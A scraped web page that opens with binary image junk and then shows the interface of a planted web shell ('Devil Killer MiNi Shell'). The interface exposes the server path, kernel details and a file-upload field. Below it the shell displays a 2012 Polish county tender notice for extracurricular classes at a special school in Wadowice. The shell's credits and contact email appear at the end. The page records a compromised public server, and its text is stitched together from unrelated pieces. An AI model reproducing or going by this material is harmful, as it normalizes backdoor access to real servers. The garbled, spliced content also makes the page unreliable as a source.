JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/330498-N-2012.html

<p class="kh_header"><b>Wadowice: Prowadzenie zajęć dodatkowych pozalekcyjnych w ramach kompetencji kluczowych realizowanych 
w Zespole Szkół Specjalnych w Wadowicach, ul. Zegadłowicza 36, 
34-100 Wadowice  w ramach projektu systemowego Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podnoszenie atrakcyjności i jakości szkolnictwa zawodowego wg 2 zadań.</b><br>
<b>Numer ogłoszenia: 330498 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wadowicki , ul. Batorego 2, 34-100 Wadowice, woj. małopolskie, tel. 033 8734200, faks 033 8232433.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.wadowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dodatkowych pozalekcyjnych w ramach kompetencji kluczowych realizowanych 
w Zespole Szkół Specjalnych w Wadowicach, ul. Zegadłowicza 36, 
34-100 Wadowice  w ramach projektu systemowego Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podnoszenie atrakcyjności i jakości szkolnictwa zawodowego wg 2 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie zajęć dodatkowych pozalekcyjnych ukierunkowanych na rozwój kompetencji kluczowych w Zespole Szkół Specjalnych w Wadowicach, ul. Zegadłowicza 36, 34-100 Wadowice w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce według 2 zadań. Zajęcia prowadzone będą w siedzibie Zespołu Szkół Specjalnych w Wadowicach ul. Zegadłowicza 36, 34-100 Wadowice. Przyjęto, że w grupie może uczestniczyć maksymalnie 15 osób 
Zamawiający udostępni zaplecze lokalowe wraz z dostępem do wybranego sprzętu oraz pomocy dydaktycznych w salach dydaktycznych znajdujących się w siedzibie szkoły. Zobowiązuje się Wykonawcę do korzystania z ww. pomocy zgodnie z przeznaczeniem oraz zapewnienia stosownego nadzoru w trakcie zajęć.
Wykonawca nie ponosi kosztów wynajęcia sali.
Opis wymagań i obowiązków Wykonawcy: Wykonawca niezwłocznie po podpisaniu umowy opracuje plan pracy zajęć w rozbiciu na zadania i cele oraz realizowaną tematykę na poszczególnych zajęciach ze wskazaniem ilości grup i ilości realizowanych godzin i przedstawi Liderowi szkolnemu do zaakceptowania. 
Obowiązki Wykonawcy:
a/ opracowanie planu pracy zajęć w rozbiciu na zadania i cele oraz realizowaną tematykę na poszczególnych zajęciach ze wskazaniem ilości grup i ilości realizowanych godzin oraz przedłożenie do zaakceptowania Liderowi szkolnemu. Plan pracy zajęć jest integralną częścią dziennika zajęć.
b/ ustalenie harmonogramu zajęć. Wszelkie zmiany w ww. harmonogramie należy uzgadniać z Liderem szkolnym. O przesunięciach terminów odbywania zajęć lub braku możliwości ich przeprowadzenia w danym dniu z przyczyn niezależnych, należy jak najszybciej telefonicznie powiadomić Lidera szkolnego oraz potwierdzić zaistniały fakt stosownym e - meilem do Lidera szkolnego. Harmonogram zajęć na kolejny miesiąc realizacji godzin, Wykonawca przedkłada Liderowi szkolnemu do 30 dnia danego miesiąca w wersji papierowej i elektronicznej.
c/ przeprowadzenie wśród uczniów biorących udział w zajęciach oceny merytorycznej przebiegu zajęć - ewaluacji na podstawie przeprowadzonych ankiet na początku i na zakończenie zajęć. Wyniki oceny merytorycznej z przebiegu zajęć Wykonawca przekaże w formie pisemnej Liderowi szkolnemu,
d/ zajęcia powinny być wykonywane profesjonalnie z użyciem nowoczesnych metod pracy, 
e/ prowadzenie dokumentacji zajęć określonej przez Lidera szkolnego,
f/ informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach 
w realizacji projektu oraz współpraca przy ich niwelowaniu,
g/ stosowanie na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków tj. logo Unii Europejskiej, logo Województwa Małopolskiego, logo projektu oraz logo powiatu wadowickiego - wzór zostanie udostępniony przez Zamawiającego,
h/ przedkładanie rachunków / faktur, których integralną częścią są miesięczne karty czasu pracy prowadzone według wzoru udostępnionego przez Zamawiającego, Liderowi szkolnemu do potwierdzenia za wykonanie usługi w następujących terminach: 
1/ dla 2 zadań w terminie: do 14.12.2012 r. za wykonanie usługi za rok 2012,
2/ dla 2 zadań w terminie: do 01.03.2013 r. za wykonanie usługi od 01.01.2013 r. do 28.02.2013r., 3/ dla 2 zadań w terminie: do 02.05.2013 r. za wykonanie usługi w okresie od 01.03.2013 r. do 30.04.2013 r.
Karty czasu pracy należy składać do 1-go dnia następnego miesiąca po zrealizowaniu zadania w danym miesiącu, zatwierdzone przez Lidera szkolnego do Biura Partnera Projektu w Wadowicach, Starostwo Powiatowe Wadowicach, ul. Batorego 2, 34-100 Wadowice, pokój 408. 
Wzór dokumentów zostanie udostępniony przez Lidera szkolnego niezwłocznie po podpisaniu umowy. W związku z realizacją zajęć w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego, Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - wzór logo POKL, UE EFS, województwa i powiatu przekaże Zamawiający.
Dokumenty, jakie winien przedłożyć Wykonawca po zakończeniu zajęć w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce Liderowi szkolnemu:
a/ dziennik zajęć wraz z listami obecności uczniów (z każdego dnia zajęć) potwierdzona własnoręcznymi podpisami uczestników zajęć wraz z planem pracy na cały okres realizacji projektu (kserokopie potwierdzone za zgodność z oryginałem),
b/ kserokopie potwierdzone za zgodność z oryginałem wydanych zaświadczeń z ukończenia zajęć, 
c/ lista z potwierdzeniem odbioru zaświadczeń przez uczestników zajęć (oryginał),
d/ imienny wykaz osób, które ukończyły i które nie ukończyły zajęć (oryginał), a w przypadku gdy uczestnik zajęć ich nie ukończył oświadczenie wskazujące powód takiej sytuacji,
e/ sporządzenie końcowego sprawozdania z ewaluacji - podsumowanie zajęć (kserokopie potwierdzone za zgodność z oryginałem),
f/ dokumentacja fotograficzna z prowadzonych zajęć (zdjęcia +płyta CD)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.21.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby muszą posiadać kwalifikacje do prowadzenia danego typu zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r., Nr 50 poz. 400) oraz 3-letnie letnie doświadczenie w pracy z uczniami w szkole ponadgimnazjalnej: zasadniczej szkole zawodowej lub technikum. Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o oświadczenie dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.wadowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wadowicach ul. Batorego 2, 34-100 Wadowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2012 godzina 10:30, miejsce: Starostwo Powiatowe w Wadowicach ul. Batorego 2, 34-100 Wadowice, sekretariat pok. nr 314 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Modernizacja kształcenia zawodowego w Małopolsce w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Wykorzystanie narzędzi ICT w kreowaniu przyszłości zawodowej uczniów szkoły specjalnej w zawodzie kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zajęć jedna grupa.
Łączna liczba zajęć 22 godzin, w okresie od podpisania umowy do 30.04.2013r
w tym:  II półrocze 2012r. - 10 godz.  I półrocze 2013r. -  12 godz.
Przedmiotem zamówienia jest prowadzenie zajęć dodatkowych pozalekcyjnych ukierunkowanych na rozwój kompetencji kluczowych w Zespole Szkół Specjalnych w Wadowicach, ul. Zegadłowicza 36, 34-100 Wadowice w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 -Potrawy świata. Obliczanie zapotrzebowania na surowce i półprodukty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zajęć jedna grupa.
Łączna liczba zajęć 22 godzin, w okresie od podpisania umowy do 30.04.2013r
w tym:  II półrocze 2012r. - 10 godz.  I półrocze 2013r. -  12 godz.
Przedmiotem zamówienia jest prowadzenie zajęć dodatkowych pozalekcyjnych ukierunkowanych na rozwój kompetencji kluczowych w Zespole Szkół Specjalnych w Wadowicach, ul. Zegadłowicza 36, 34-100 Wadowice w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com